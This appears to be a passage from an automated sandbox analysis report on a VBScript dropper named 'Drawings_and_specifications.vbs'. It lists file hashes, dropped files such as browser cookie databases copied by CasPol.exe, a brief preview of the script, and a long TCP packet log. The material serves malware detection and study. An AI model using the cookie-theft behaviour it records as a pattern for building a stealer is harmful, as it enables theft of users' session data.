                          Size (bytes):62582
                          Entropy (8bit):7.996063107774368
                          Encrypted:true
                          SSDEEP:1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
                          MD5:E71C8443AE0BC2E282C73FAEAD0A6DD3
                          SHA1:0C110C1B01E68EDFACAEAE64781A37B1995FA94B
                          SHA-256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
                          SHA-512:B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
                          Malicious:false
                          Preview:MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k...*.Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G|.*[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.

                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                          Download File
                          Process:C:\Windows\System32\wscript.exe
                          File Type:data
                          Category:modified
                          Size (bytes):328
                          Entropy (8bit):3.1335351732898324
                          Encrypted:false
                          SSDEEP:6:kKbkPury/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:DRCvkPlE99SNxAhUext
                          MD5:72F96EA9799B4714398CD5C5926B0F70
                          SHA1:795409D26B11133811B52F02FBEE03D671709108
                          SHA-256:B84E3BF1D60B97E09892F1796CE23EE1598B4D0D4B856B7599D2AE6FC11E5731
                          SHA-512:769AD6F38731D4ACB36487CCF6B8FD49F3F9A975E460FAD1B6CA9E505AA01E3B8F0FA0BA05ED13A957DD78551F6C92F775699EE31325F7123436AE5CF36717AD
                          Malicious:false
                          Preview:p...... ...........y.U..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):0.34726597513537405
                          Encrypted:false
                          SSDEEP:3:Nlll:Nll
                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                          Malicious:false
                          Preview:@...e...........................................................

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_glx2dfty.sgz.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbk0ivnj.hea.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Roaming\0dg5hfk0.0lf\Chrome\Default\Cookies

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 36, database pages 24, 1st free page 14, free pages 11, cookie 0x5, schema 4, UTF-8, version-valid-for 36
                          Category:dropped
                          Size (bytes):98304
                          Entropy (8bit):2.9216957692876595
                          Encrypted:false
                          SSDEEP:384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
                          MD5:1A706D20E96086886B5D00D9698E09DF
                          SHA1:DACF81D90647457585345BEDD6DE222E83FDE01F
                          SHA-256:759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
                          SHA-512:CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
                          Malicious:false
                          Preview:SQLite format 3......@ ...$...................................................................$..S`.........g.....[.[.[................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Roaming\0dg5hfk0.0lf\Edge Chromium\Default\Cookies

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 7, database pages 5, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                          Category:dropped
                          Size (bytes):20480
                          Entropy (8bit):2.3172897780113213
                          Encrypted:false
                          SSDEEP:96:oNwCz2C+NR73QOaq9kozeav2RT3VnnnekEEN9ORelnasL:ouZC+NJLaqe0LUTpnn1DN9OROnj
                          MD5:D5ECE7413F423743B368D55921D78C0A
                          SHA1:3F1E854E373FB2F9BFD868AF38AF5C6B3CD2A71D
                          SHA-256:D38D8A693CD4B718EA9E4995939262749893878EE9A0931BEB0F33781979FD77
                          SHA-512:F54CAB99D2795DF2D01E54D1E1184D116A56E8053140BAF868ADBFC7EE35EFBC59F83E3FF26C84E0D6D1A118BB79CAB82527F1502D328483953A0A58BEED8E0B
                          Malicious:false
                          Preview:SQLite format 3......@ ..........................................................................O}.........g.....8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Roaming\0dg5hfk0.0lf\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                          Category:dropped
                          Size (bytes):98304
                          Entropy (8bit):0.08231524779339361
                          Encrypted:false
                          SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                          MD5:886A5F9308577FDF19279AA582D0024D
                          SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                          SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                          SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                          Malicious:false
                          Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          Static File Info

                          General

                          File type:ASCII text, with CRLF, CR line terminators
                          Entropy (8bit):5.51957869453507
                          TrID:
                            File name:Drawings_and_specifications.vbs
                            File size:95618
                            MD5:b1abf17a8d087849ecc7e178684bba39
                            SHA1:c3829bc4c5cf797eb636a94dda9aa01054ebecee
                            SHA256:7382bb30b28a4db6baa816a694925b98ce6501a4d97d0d62fe3f27f2f26e3117
                            SHA512:3fbb4dd5515bf8721d3b73c918bd687002f6895eca629baa8f996b10ad5f80c7fb2d2058f3a4b07d71190d0dedbe95cd93eeb3bdd03a7e4186bc757a23ce17d3
                            SSDEEP:1536:x+tnlQvqtWUcYERxDcJze7d5XJzcliQLsC+uUf87Zg8saEE5BP8Ft3pZw436hpsY:qnmujanFVDO1aAM5qldluTnQERACxA
                            TLSH:B993E5E0BD551318355B1BAEE85EC824DDE4CC6E011200256FD9B27F3A5A21BFAEF50B
                            File Content Preview:..'Pabulum Levantinskes Redefuldens Cymblens tilthead Holdernes Gstebuddets Trdokken ..'Loamier Afskedshilseners Deliming Partialobligationernes Drejekondensatorer94 Drums Metalcraft Vejrberetninger overhonours ..Undervogns = "Wscript.Shell"....set Bnkevl

                            File Icon

                            Icon Hash:e8d69ece869a9ec4

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Mar 13, 2023 14:09:56.613955975 CET49798443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:09:56.614029884 CET44349798142.250.184.206192.168.11.20
                            Mar 13, 2023 14:09:56.614265919 CET49798443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:09:56.620374918 CET49798443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:09:56.620443106 CET44349798142.250.184.206192.168.11.20
                            Mar 13, 2023 14:09:56.680080891 CET44349798142.250.184.206192.168.11.20
                            Mar 13, 2023 14:09:56.680464029 CET49798443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:09:56.681617975 CET44349798142.250.184.206192.168.11.20
                            Mar 13, 2023 14:09:56.681813955 CET49798443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:09:56.683134079 CET49798443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:09:56.683156013 CET44349798142.250.184.206192.168.11.20
                            Mar 13, 2023 14:09:56.683666945 CET44349798142.250.184.206192.168.11.20
                            Mar 13, 2023 14:09:56.689543009 CET49798443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:09:56.732465029 CET44349798142.250.184.206192.168.11.20
                            Mar 13, 2023 14:09:57.293257952 CET44349798142.250.184.206192.168.11.20
                            Mar 13, 2023 14:09:57.293685913 CET44349798142.250.184.206192.168.11.20
                            Mar 13, 2023 14:09:57.293858051 CET49798443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:09:57.295804024 CET49798443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:10:19.924695015 CET49807443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:10:19.924757004 CET44349807142.250.184.206192.168.11.20
                            Mar 13, 2023 14:10:19.925024986 CET49807443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:10:19.951206923 CET49807443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:10:19.951236963 CET44349807142.250.184.206192.168.11.20
                            Mar 13, 2023 14:10:19.985774994 CET44349807142.250.184.206192.168.11.20
                            Mar 13, 2023 14:10:19.985991955 CET49807443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:10:19.987247944 CET44349807142.250.184.206192.168.11.20
                            Mar 13, 2023 14:10:19.987435102 CET49807443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:10:20.106865883 CET49807443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:10:20.107897043 CET44349807142.250.184.206192.168.11.20
                            Mar 13, 2023 14:10:20.108146906 CET49807443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:10:20.111696959 CET49807443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:10:20.152496099 CET44349807142.250.184.206192.168.11.20
                            Mar 13, 2023 14:10:20.585026026 CET44349807142.250.184.206192.168.11.20
                            Mar 13, 2023 14:10:20.585374117 CET49807443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:10:20.586383104 CET49807443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:10:20.586556911 CET44349807142.250.184.206192.168.11.20
                            Mar 13, 2023 14:10:20.586736917 CET49807443192.168.11.20142.250.184.206
                            Mar 13, 2023 14:10:20.697726965 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.697742939 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.697925091 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.698213100 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.698223114 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.726955891 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.727097034 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.727178097 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.727629900 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.727785110 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.727833033 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.730699062 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.730926037 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.731050014 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.731479883 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.772353888 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.953047037 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.953305006 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.953927040 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.954242945 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.954750061 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.954910040 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.954931021 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.954931021 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.955617905 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.955791950 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.955843925 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.955857038 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.956068993 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.966485977 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.966682911 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.966706991 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.966881990 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.966909885 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.966933012 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.967072010 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.967505932 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.967595100 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.967680931 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.967705011 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.967741966 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.967813015 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.968277931 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.968441963 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.968446016 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.968468904 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.968570948 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.968571901 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.969264030 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.969346046 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.969453096 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.969477892 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.969610929 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.969738960 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.970031977 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.970221043 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.970246077 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.970406055 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.970419884 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.970649004 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.970671892 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.970963955 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.970976114 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.971261024 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.971276045 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.971344948 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.971425056 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.971441984 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.971513033 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.971674919 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.972145081 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.972246885 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.972395897 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.972419024 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.972434044 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.972589970 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.973115921 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.973203897 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.973293066 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.973315954 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.973511934 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.973850965 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.974008083 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.974689007 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.974864006 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.976752043 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.976845026 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.976942062 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.976960897 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.977068901 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.977154970 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.977169037 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.977300882 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.977399111 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.977412939 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.977452040 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.977583885 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.977987051 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.978091955 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.978399038 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.978414059 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.978599072 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.978921890 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.979012012 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.979100943 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.979116917 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.979181051 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.979270935 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.979748011 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.979917049 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.980108023 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.980123043 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.980259895 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.980710983 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.980855942 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.980871916 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.981029034 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.981040955 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.981293917 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.981586933 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.981678963 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.981859922 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.981875896 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.982119083 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.982403040 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.982510090 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.982692957 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.982709885 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.982817888 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.982917070 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.983267069 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.983412027 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.983426094 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.983573914 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.983609915 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.983683109 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.983798981 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.983813047 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.983886003 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.983980894 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.984364986 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.984440088 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.984536886 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.984551907 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.984584093 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.984734058 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.984744072 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.984994888 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.985269070 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.985352993 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.985472918 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.985486984 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.985544920 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.985634089 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.985641956 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.985954046 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.986231089 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.986435890 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.986449957 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.986574888 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.986583948 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.986748934 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.987129927 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.987232924 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.987289906 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.987303019 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.987587929 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.987601042 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.987845898 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.987972975 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.988073111 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.988225937 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.988240957 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.988251925 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.988389015 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.988914967 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.989042044 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.989105940 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.989118099 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.989134073 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.989198923 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.989224911 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.989279032 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.989290953 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.989449978 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.989460945 CET44349808142.250.186.65192.168.11.20
                            Mar 13, 2023 14:10:20.989602089 CET49808443192.168.11.20142.250.186.65
                            Mar 13, 2023 14:10:20.989901066 CET44349808142.250.186.65192.168.11.20
